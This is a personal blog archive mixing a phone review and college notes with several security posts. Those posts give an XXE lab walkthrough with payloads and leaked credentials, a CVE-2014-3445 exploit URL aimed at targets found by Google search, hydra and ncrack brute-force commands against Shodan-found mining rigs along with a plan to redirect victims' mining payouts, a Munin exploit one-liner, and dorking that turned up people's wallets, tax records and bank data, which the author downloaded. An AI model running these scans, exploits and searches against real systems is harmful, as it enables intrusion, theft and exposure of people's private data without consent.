Everything and nothing: 2014

Jul 23, 2014

First month with Republic Wireless

So to start off, I have been following RW since the beginning, was accepted into all the beta rollouts but never had the money to purchase the phones. First I was on a Cricket, then I moved to GoSmart Wireless, always with a crappy out-of-date phone, and for a techy like me, it was a nightmare as I tried to do stuff with my phone to only have it lock-up for a minute. I struggled to receive/send calls and my service was spotted at best.My college requires me to have a weekly phone call with a student-mentor and having the calls drop with my old service was a constant pain in the butt and I was always in a constant state of worry as I waited to hear back from jobs that I had applied for, because I was worried I missed the call, which happened frequently. About a month ago, my wife had some major medical stuff going on, and she was texting me and calling me, but I didn't get them because my service and phone were terrible. Finally, she got a hold of me (after I walked into the ER), she glared at me and said "Get your new phone". I plan on breaking this review into two parts, the phone and the service/company. So here goes:

Republic Wireless:
Like I said, I have been wanting to join since the beginning but never could afford it. When I heard that RW was picking up the Moto G for $150 I was excited and couldn't wait till I could afford it. After making my order, it getting sent out the next day, arriving quite some time later (I hate shipping companies), I was excited to start up my phone and see if things would be different. I was extremely pleased. Activating my account was a snap. Transferring my phone number was a snap. Making and receiving phone calls was finally happening! My office is out in the garage so I was worried about my connection to WiFi/Cell but service was great and the handovers smooth if I decided to take a walk while making my phone calls. I would hear a click, half a second of silence, and then the call would pick right up. I was told sometimes my voice drops, but that isn't the fault of RW but rather my 9mb/1mbps connection. I want to upgrade my DSL but that will have to wait till after I get a good job. I've been extremely pleased with my service and connection.

Moto G: I bought the 8GB version because that was all I could afford at the time. I was thinking I wouldn't use the 8GB all up as I never did on my old phones, boy was I wrong. I knew the phone didn't have an SD card slot and thought I wouldn't miss it, again, I was wrong. I constantly take pictures of my kids and videos of them as well and that burns through the 8GB rather quickly. I did get the free 50GB of space from Google but I like having all my videos/pictures on hand, but I got use to browsing them from the internet (again thank you RW for good service) and after taking them, auto-backing up, I would delete them off my phone, and just browse them on the internet on my G-Drive. However, I was still running out of space because I am now playing a lot more 3D games because this phone has the power to play them unlike my old phone(s). Man, this phone is a power-house! My only complaint is that I cannot root/modify it because I don't want to screw with RW app that manages connection. That was a big disappointment as I am a huge mod nuthead. I have designed 3 ROM's for an Android tablet where there was only two developers, me and my friend who taught me how to create ROM's. So not being able to modify the phone was a bit disappointing BUT I really didn't need to modify the phone as it performs amazingly. There is an occasional glitch where after going to the menu of apps, I wouldn't see anything but it happens only occasionally.

I have been extremely pleased and happy with what I paid for.

Jun 24, 2014

Always good to have a positive response

I was curious about a certain companies website and did a scan of their website and was able to enumerate not only their all their Wordpress plugins (and vulnerabilities and exploits) but also userID's and usernames.

[+] URL: http://xxxxxxxx/
[+] Started: Wed Jun 11 21:29:40 2014

[+] robots.txt available under: 'http://xxxxxxxx/robots.txt'
[!] The WordPress 'http://xxxxxxxx/readme.html' file exists
[+] Interesting header: CF-RAY: 1390e7f7776d02da-AMS
[+] Interesting header: SERVER: cloudflare-nginx
[+] XML-RPC Interface available under: http://xxxxxxxx/xmlrpc.php

[+] WordPress version 3.8.3 identified from meta generator

[+] Name: akismet - v2.5.9
| Location: http://xxxxxxxx/xxxxxxxx/plugins/akismet/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/akismet/readme.txt

[+] Name: backwpup - v3.1.2
| Location: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/backwpup/

[!] Title: BackWPUp 2.1.4 - Code Execution
Reference: http://www.exploit-db.com/exploits/17987/

[!] Title: plugin BackWPup 1.5.2, 1.6.1, 1.7.1 - Remote and Local Code Execution Vulnerability
Reference: http://osvdb.org/71481

[+] Name: better-wp-security - v3.6.5
| Location: http://xxxxxxxx/xxxxxxxx/plugins/better-wp-security/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/better-wp-security/readme.txt

[!] Title: Better WP Security 3.6.3 - Online Backup Storage current_time Function Brute Force Disclosure
Reference: http://packetstormsecurity.com/files/125219/
Reference: http://osvdb.org/103358

[!] Title: Better WP Security 3.6.3 - /zzzzzzz/admin-ajax.php license Parameter Stored XSS Weakness
Reference: http://packetstormsecurity.com/files/125219/
Reference: http://osvdb.org/103357

[+] Name: calculated-fields-form - v1.0.1
| Location: http://xxxxxxxx/xxxxxxxx/plugins/calculated-fields-form/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/calculated-fields-form/README.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/calculated-fields-form/

[+] Name: contact-form-7 - v3.7.2
| Location: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/
[!] An error_log file has been found: http://xxxxxxxx/xxxxxxxx/plugins/contact-form-7/error_log

[!] Title: Contact Form 7 & Old WP Versions - Crafted File Extension Upload Remote Code Execution
Reference: http://packetstormsecurity.com/files/125018/
Reference: http://seclists.org/fulldisclosure/2014/Feb/0
Reference: http://osvdb.org/102776

[+] Name: dw-question-answer - v1.2.8
| Location: http://xxxxxxxx/xxxxxxxx/plugins/dw-question-answer/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/dw-question-answer/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/dw-question-answer/

[+] Name: google-analytics-dashboard-for-wp - v4.2.18
| Location: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-dashboard-for-wp/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-dashboard-for-wp/readme.txt

[+] Name: google-analytics-for-wordpress - v4.3.5
| Location: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-for-wordpress/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-for-wordpress/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/google-analytics-for-wordpress/

[+] Name: jetpack - v2.7.2
| Location: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/jetpack/

[!] Title: Jetpack <= 2.9.2 - class.jetpack.php XML-RPC Access Control Bypass
Reference: http://jetpack.me/2014/04/10/jetpack-security-update/
Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0173
Reference: http://secunia.com/advisories/57729
Reference: http://osvdb.org/105714
[i] Fixed in: 2.9.3

[+] Name: link-manager
| Location: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/link-manager/

[+] Name: mailchimp - v1.4.1
| Location: http://xxxxxxxx/xxxxxxxx/plugins/mailchimp/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/mailchimp/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/mailchimp/

[+] Name: members - v0.2.4
| Location: http://xxxxxxxx/xxxxxxxx/plugins/members/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/members/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/members/

[+] Name: pdfjs-viewer-shortcode - v1.2
| Location: http://xxxxxxxx/xxxxxxxx/plugins/pdfjs-viewer-shortcode/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/pdfjs-viewer-shortcode/readme.txt

[+] Name: really-simple-captcha - v1.7
| Location: http://xxxxxxxx/xxxxxxxx/plugins/really-simple-captcha/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/really-simple-captcha/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/really-simple-captcha/

[+] Name: smart-manager-for-wp-e-commerce - v3.6
| Location: http://xxxxxxxx/xxxxxxxx/plugins/smart-manager-for-wp-e-commerce/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/smart-manager-for-wp-e-commerce/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/smart-manager-for-wp-e-commerce/

[+] Name: woocommerce - v2.1.2
| Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce/

[+] Name: woocommerce-bulk-discount - v2.2
| Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-bulk-discount/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-bulk-discount/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-bulk-discount/

[+] Name: woocommerce-delivery-notes
| Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-delivery-notes/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-delivery-notes/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-delivery-notes/

[+] Name: woocommerce-product-archive-customiser - v0.3.0
| Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-product-archive-customiser/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-product-archive-customiser/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-product-archive-customiser/

[+] Name: woocommerce-sequential-order-numbers - v1.3.1
| Location: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-sequential-order-numbers/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-sequential-order-numbers/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/woocommerce-sequential-order-numbers/

[+] Name: wordpress-importer - v0.6.1
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-importer/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-importer/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-importer/

[+] Name: wordpress-popup - v4.4.5.4
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-popup/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-popup/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-popup/

[+] Name: wordpress-seo - v1.4.25
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/readme.txt
| Changelog: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/changelog.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wordpress-seo/

[!] Title: WordPress SEO 1.14.15 - index.php s Parameter Reflected XSS
Reference: http://packetstormsecurity.com/files/123028/
Reference: http://osvdb.org/97885

[!] Title: WordPress SEO 1.4.6 - Reset Settings Feature Access Restriction Bypass
Reference: http://secunia.com/advisories/52949
Reference: http://osvdb.org/92147

[+] Name: wp-advanced-importer
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-advanced-importer/
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-advanced-importer/

[+] Name: wp-countdown-timer - v1.0.0
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-countdown-timer/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-countdown-timer/README.txt

[+] Name: wp-fastest-cache - v4.3
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-fastest-cache/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-fastest-cache/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-fastest-cache/

[+] Name: wp-mail-smtp - v0.9.4
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-mail-smtp/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-mail-smtp/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-mail-smtp/

[+] Name: wp-memory-usage
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-memory-usage/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-memory-usage/readme.txt
[!] Directory listing is enabled: http://xxxxxxxx/xxxxxxxx/plugins/wp-memory-usage/

[+] Name: wp-super-cache - v1.4
| Location: http://xxxxxxxx/xxxxxxxx/plugins/wp-super-cache/
| Readme: http://xxxxxxxx/xxxxxxxx/plugins/wp-super-cache/readme.txt

[+] Enumerating usernames ...
[+] Identified the following 8 user/s:
+----+--------------+--------------+
| Id | Login | Name |
+----+--------------+--------------+
| x | xxxx | xxxx |
| x | xxxxxxxx | xxxxxxxx |
| x | xxxxxx | xxxxxx |
| x | xxxxxxxxxx | xxxx |
| x | xxxxxxxxxxxx | xxxxx |
| x | xxxxxxxx | xxxxxxxx |
| x | xxxxxxxxxxxx | xxxxxxxxxxxx |
| xx | xxxxxx | xxxxx |
+----+--------------+--------------+

I was surprised at my results and decided to write a quick email to the owner of the company with my information. I got a nice thank you letter back.

A couple weeks later, on a public forum, he thanked me again, said it was all taken care of now, and asked me to send my contact info. I did, and never heard anything back.

This arrived in the mail yesterday.

May 30, 2014

Practicing XXE

***DISCLAIMER ALL MY WORK HERE IS DONE AT WWW.HACKING-LAB.COM*****

XML external entity injection vulnerabilities arise because the XML specification allows XML documents to define entities which reference resources external to the document. XML parsers typically support this feature by default, even though it is rarely required by applications during normal usage. External entities can reference files on the parser's filesystem; exploiting this feature may allow retrieval of arbitrary files, or denial of service by causing the server to read from a file such as /dev/random.

They can also reference URLs, exploiting this feature may allow port scanning from the XML parser's host, or the retrieval of sensitive web content which is otherwise inaccessible due to network topology and defenses.

I performed this attack by testing the xml constructor by monitoring the connection to the search form using Zap. After submitting a test search, I monitored how it came out in Zap. I then proceeded to resend the packet with modified parameters.

The first injection I used to see if it was possible was the following

< ?xml version="1.0" encoding="UTF-8" ? >
< !DOCTYPE foo [
< !ENTITY foo SYSTEM "file:///etc/passwd" >
] >
< query >
< result-limit >1&foo;< /result-limit >
< bell-name >< /bell-name >
< bell-description >< /bell-description >
< /query >

After which I tested to see if application was vulnerable to this type of attack, I began to try new folder locations looking for configurations files for the MYSQL database. I started looking in the normal places /etc/my.cnf, root/.mycnf and so forth till I came across the properties page for the web application itself.

I then proceeded to modified my injection parameters with this:

< ?xml version="1.0" encoding="UTF-8" ? >
< !DOCTYPE foo [
< !ENTITY foo SYSTEM "file:///opt/applic/tomcat/webapps.properties/mysql.properties" >
] >
< query>
< result-limit >1&foo;< /result-limit >
< bell-name >< /bell-name >
< bell-description >< /bell-description >
< /query >

I inserted it back into ZAP and resent the packet and was returned the following.

# MYSQL PROPERTIES - TIME IN SECONDS
################################################################
mysql.driver = org.gjt.mm.mysql.Driver

mysql.username = glockenemil
mysql.password = Nt88,.po

mysql.bells.url = jdbc:mysql://127.0.0.1:5506/glocken_emil?autoDeserialize=true
mysql.login.url = jdbc:mysql://127.0.0.1:5506/login
mysql.session.url = jdbc:mysql://127.0.0.1:5506/sessionservice

mysql.session.testquery =
mysql.login.testquery =
mysql.bells.testquery =

mysql.connections.max = 100
mysql.connections.min = 10
mysql.connections.increaserate = 2
mysql.connections.timeout = 120
mysql.connections.maxage = 900

# LOGIN TABLE DEFS
#################################################################
mysql.tblLogin = users

mysql.fldAdditionalTime = additionaltime
mysql.fldReleaseTime = releasetime
mysql.fldUsername = username
mysql.fldTries = tries
contactForm = no

XML external entity injection makes use of the DOCTYPE tag to define the injected entity. XML parsers can usually be configured to disable support for this tag. You should consult the documentation for your XML parsing library to determine how to disable this feature. It may also be possible to use input validation to block input containing a DOCTYPE tag.

May 28, 2014

Application of CVE-2014-3445

Unauthenticated key return

This morning I happen to notice on Twitter a recent CVE release that provides a surprisingly easy attack vector to recover a websites administrator password as long as its running the correct software.

https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/

“Vulnerability title: Unathenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages"

“The default setup allows an unauthenticated user to access administrative functions such as backing up of key files within the CMS. This is done by appending the following to a domain using the software affected:

/backup.php?a=2&k=6f15afa1ac4edea0g145e884116334b7

Where “a” is the file number to back up and “k” is the MD5key used to authenticate the administrator, however if “k” does not match the correct key rather than disallowing the unauthenticated user to back up the file the service will provide the user with the correct key.

For example:

Failure, wrong key. The right key is 5f17aca1ae2edea0f145e884116371a5

Using this new key in the url such as below:

/backup.php?a=2&k=5f17aca1ae2edea0f145e884116371a5 will allow the user to perform the backup of files.

In addition to this the key is generated by the code:

$backupkey=MD5

Making it trivial to decrypt the key provided above to gain the administrators password and gain further control over the site.”

This is surprisingly easy to accomplish.

Doing a quick search on Google provides plenty of targets

Here is a practice target:

I now have a target, and its page ID number

Simply modifying the provided CVE looks like this

WWW.TARGET_PRACTICE_WEBSITE.com/backup.php?9=2&k=6f15afa1ac4edea0g145e884116334b7

Returns this

As it returns a MD5 hash, its simply a matter of time to reverse the hash and recover the password

Mar 28, 2014

BAMT Possibilities

BAMT possibilities

Yet another dig into the security of BAMT mining client, an awesome project in itself!

As always, I started my search with Shodan for ‘bamt-miner’ to get a good idea of a test target to run an nmap on.

Here is a typical ‘bamt-miner’ port list.

Discovered open port 22/tcp on IP_ADDRESS

Discovered open port 3389/tcp on IP_ADDRESS

Discovered open port 5910/tcp on IP_ADDRESS

Discovered open port 5666/tcp on IP_ADDRESS

Port 22: SSH

Port 3389: RDP

Port 5910: modified VNC listening port

Port 5666: Munin process monitor

More detail look:

22/tcp open ssh OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)

| ssh-hostkey: 1024 7f:86:d4:d4:cf:8d:87:9d:53:51:07:2b:12:9a:ca:7e (DSA)

|_2048 c6:ba:95:4e:e2:fe:47:e9:de:dc:4e:41:08:83:56:d2 (RSA)

25/tcp filtered smtp

3389/tcp open ms-wbt-server xrdp

5666/tcp open tcpwrapped

5910/tcp open vnc VNC (protocol 3.8)

| vnc-info:

| Protocol version: 3.8

| Security types:

| VNC Authentication

|_ Tight

Plugging the IP address in and the port, I was able to make a VNC connection but did not attempt a password entry. VNC does have the nice feature of timing itself out with every bad password connection attempt, which is a great feature except for one weakness for the legit owner. This weakness is that someone who is brute forcing could cause you a near indefinite timeout as VNC increases the timeout with every bad attempt. Just a quick note here: Not everyone had VNC installed/running.

Now the thing I was most interested was port 5666 as I have never heard of it. It turns out to be a Munin graph monitor, something that BAMT makes heavy use of to monitor the system.

http://munin-monitoring.org/

Doing my research, I came across one proof-of-work exploit

http://www.securityfocus.com/bid/53032/exploit

printf 'GET /cgi-bin/munin-cgi-graph/%%0afoo%%0a/x/x-x.png HTTP/1.0\r\nHost: localhost\r\nConnection: close\r\n\r\n' | nc localhost 80

Also another possibility

http://www.cvedetails.com/cve/CVE-2012-3512/

Munin before 2.0.6 stores plugin state files that run as root in the same group-writable directory as non-root plugins, which allows local users to execute arbitrary code by replacing a state file, as demonstrated using the smart_ plugin.

http://www.cvedetails.com/cve/CVE-2012-3513/

munin-cgi-graph in Munin before 2.0.6, when running as a CGI module under Apache, allows remote attackers to load new configurations and create files in arbitrary directories via the logdir command.

Now typing in

http://IP_ADDRESS/munin/

I can see that its running v1.4.5

This page was generated by Munin version 1.4.5 at 2014-03-27 17:45:12+0000 (UTC)

Now I don’t really know if this version of Munin is vulnerable to these three possible exploits/vulnerabilities, as it’s a bit outside my skill level.

Another weakness is the open SSH on this host. This is my ncrack line

ncrack -f --user su,root,user -P top50000.pwd -d7 ssh://IP_ADDRESS,at=3

From reading on BAMT, these are the typical user accounts that exist on the system.

Here were my suggestions:

Update Munin version to 2.1.6 or whatever is newest

Add to your iptables this

iptables -A INPUT -p tcp -i eth0 -m state --state NEW --dport 22 -m recent --update --seconds 15 -j DROP

iptables -A INPUT -p tcp -i eth0 -m state --state NEW --dport 22 -m recent --set -j ACCEPT

This will prevent brute-force attacks on SSH by slowing down connection attempts

***Update*****
So a little update, talk to 'lodcrappo' on bitcointalk

If someone is dumb enough to put a bamt machine directly on the net, they get what they deserve. Write whatever you'd like, it won't help people that dumb anyway.
One other note.. Even if munin, ssh, and all the standard software was secured, a bamt rig is *not* safe and should never be unprotected on the net. This is because the bamt tools themselves are fundamentally insecure. This was a conscious design decision. Bamt nodes on a network communicate using completely unchecked and unfiltered protocols. There isn't even a semblance of authentication or security. The bamt farm utilities like mgpumom will never be safe for internet use.
Please do not attempt to instruct anyone on how to secure a bamt node for internet connectivity, it cannot be done. If you are writing an article it should focus on how to safely use bamt, and that means only behind nat / firewalls, period.

Mar 1, 2014

I want your coins!

"Cryptocurrency is a type of digital currency that is based on cryptography. Cryptocurrency uses cryptography for security, making it difficult to counterfeit. Public and private keys are often used to transfer the currency from one person to another."
http://www.techopedia.com/definition/27531/cryptocurrency

Why am I talking about this today? Well because personally I use this. I have bitcoins, litecoins, and dogecoins. I personally run two XFX R9-270X and one XFX R9-270 on my Windows 7 machine, generating 1400KH/s a day. Typically I earn anywhere between $6-8 a day, which adds up to a nice amount of pocket change. However, I put some serious money into this computer, to the point where it takes me a month to pay off just one of those video cards. There are others out there like me, who are small timers, and do this as a hobby and for a bit of pocket change. However, there are those out there who do this for profit and invest incredible amount of money.

Very few people think about the security of their mining machine as the system is incredibly though to beat. Bitcoin, however, recently, showed that it is possible to beat the system. There are also many malware's out there designed to still people's wallets. However, today I will be talking about something even far less noticeable way to steal coins.

BAMT is a automated Linux distro designed to run off a flash drive, to easy the difficulty of managing and monitoring the process of mining for scrypt based coins. Its very nicely done and is pretty easy to use. Most people use it successfully with no security risks but there are those out there who didn't think that it has one risk. This risk is for those who want to check on their machine outside of their home and do something terrible. They point their machine in a public facing IP address!
Lets fire up Shodan and type in "bamt-miner" and see what results we get.

Wow, that is quite a few returns for a free user like me. As a free user, I am allowed access to 50 results, but if I was just to pay $5, I could have access to up to 10,000 results. That is a LOT of IP address.
So, so what I have an IP address. What can I do with it? First lets plug into a web browser and see what we get.

We have confirmed that there is active mining going on.

Lets now also look at the guide for running bamt
https://litecointalk.org/index.php?topic=2924.0
blah blah blah blah blah blah blah......RDP?!?!??!?!?!?!?!?!?!?!??!??!

People are actually posting an RDP port, non-forwarded to the public. The question, can I do it? Pull up remote desktop and lets punch in one of those IPs.

And I have successfully connected via RDP

So the first thing I try is the default user name and password listed in the guide
user: user
pass: live

Doesn't work, good, as the guide recommends you change the user and the su password right away as one of the first steps. However, we STILL have a successful connection. Why is this important? Because BAMT does NOT include an timeout or bad login count system. Which means I have all the time in the world to try various logins. Lets automate the process.

Now we know that there are two user accounts "user" and "su", as typically 99% of the people will not change the accounts, just the passwords, so I plug those into my user.txt and use one of my best password dictionaries that is filled with typical passwords and I select an American IP so that my American words will work.

"hydra -L users.txt -P the_best.txt -t 4 -W 3 IP.ADD.RESS.HERE rdp"
or
'"hydra -P the_best.txt -t 4 -W 3 IP.ADD.RESS.HERE vnc"

I have all the time in the world to beat the RDP or VNC services and the system will never lock me out.

Now, why would I even bother? There is big money in mining, especially if you found someone running a big mining system and also because once I get into BAMT's console, I can redirect it to mine to my account at another pool. Most people who use BAMT actually do not monitor it as the system is designed to more automated and "secure". What would eventually happen is people will notice they aren't getting paid and check their miner and then notice that the pool/user/pass has been changed and probably will be very confused as its Linux, its suppose to be secure.

What can be done about this? Two things, not putting it publically facing IP, you can wait to get home to check your mining, people, geez. And also assigning RDP to only access connections from one or two computers, like your home and work computer.

Jan 20, 2014

Dangers of Public Facing “Private” ftp servers

In today’s age of the internet, nothing is truly private on the internet. Crawlers search the internet and catalog everything. And oh boy do I mean everything.

Out of curiosity one day, I decided to use google search engine to amuse myself. My initial though was thinking about bitcoins, as I am gung-ho for it, and I mine litecoins and dogecoins myself.

Here is my below query:

Wallet filetype:dat site:dropbox.com

Results:

Wow, look at those people who weren't very bright. So after some magic conversions, I managed to open just one of those bitcoins wallets and here is what I saw:

Now I am getting excited and I want to see how far this rabbit hole goes. I starting thinking about what would be the great place to store my backups and I started thinking ftp servers would be great.

Googling ftp search engines lead me to http://filemare.com which appeared to be a great search engine.

Searching for the same file context as with google I was able to find a few wallets of various coins, however, this time people had file permissions set on them of 0600, so nice dice in downloading them. Good on them.

But where else does this rabbit hole go? I noticed that there was various other files came up that matched the string of “wallet”. What did I find? Something called “eWallet” that links to software http://www.iliumsoft.com/ewallet

I found hundreds of these from a good ten to twenty people who have backed their password storage for websites and credit cards. I was shocked that people would do this. I downloaded one of these files and proceeded to open it up with the software. Password encrypted, good on the company. Resarch into the software reveled that versions older that 7.1 used MD5 and with a simple hexdump command you can pull out the hash. I attempted to do it but was unsuccessful, more than likely because I am on my Windows laptop and my hexdump tool is poor at best. Either that or I just suck. However, I was able to see catagories inside these dumps, for example:

So where else does this go? Outlook pst files are publicly available. A quick download and opened with a read-only PST viewer:

Or how about this? A private Keypass key

How about shipping orders for flowers?

Paypal transaction histories?

Are you kidding me???? This guy has his social security number, address, income and more listed in just one public facing tax document?

T-mobile account, phone number(s) and payment information:

Bank account info:

I even found a website, they backed up their entire sql database as their website is currently down:

How about an entire phones CWM backup?

This is crazy! I cannot believe what I found. Why would people allow this type of information to be posted?

The answer: lack of education. Total for the day: 12 people’s lives could have been ruined by me. I’m not even sure if I should contact these people. Embarrassment can cause people to lash out. I've blurred the screenshots as best as possible, and all my research files are being deleted. My favorite find today?

ftp://xxxxxx.xxxxx.xxxx/Username/Backup/Dropbox/Private

Jan 7, 2014

Don't care for your boss

Completed RIT1 last week which is one of the leadership classes, official title is "Leadership Concepts and Application". I spent the entire week and a half sobbing and crying as I worked my way through it. Why do you ask? Because it was dry, boring, and uninteresting to me. I do not particularly care for HR stuff so forcing myself through that course was painstaking. I quickly read the chapters and did my Taskstream essays. There was four of them and each got sent back to me two to three times to get re-written. It was very frustrating.
What was particularly frustrating was the TurnItIn plagiarism check software they had builtin. This scans your paper and compares to others and decides if you stole others ideas. Great in theory but bad in practice. While I completely understand the need for this software but the problem was that WGU would not accept the paper if it exceeded 30% originality report. Well....we use quotes in our papers and so those "count" against you. I would submit my paper, wait for the report to come back and see if it was above that mark and if it was, I would cancel the paper and resubmit after rewording stuff. Because of the rewording, I wasn't always pleased with the way I had to write it or paraphrase things. It became quite frustrating but heh....got the dang class passed.

So whats next since I am technically done with my first semester at WGU? Why, onto the next class, do not stop! Now doing the CQV1 which is the CCNA class. Awesome! My student-mentor let me move into this class so that the knowledge from my CCENT would still be in my head. So far I'm listening/watching the first four videos which are review videos, hence my not paying to much attention and writing this blog.

In other news, still trying to set up my litecoin mining rigs. I bought yet another video card but the x4 PCI-E slot on my mobo is busted. I have plenty of money coming in on paypal but it won't be available till the 22nd of January. Then I'll buy a riser cable to use my x1 slot for that new card. Currently hashing at 430KH/s, which isn't that great. Generating about point one five coins a day, which is not enough. If I can get this new card in, it will boost me to 750-800KH/s which should put me to point two five coins a day. Try to convince the wife to let me use some of our savings to build a dedicated machine, but she said no. Dang.

Everything and nothing

aD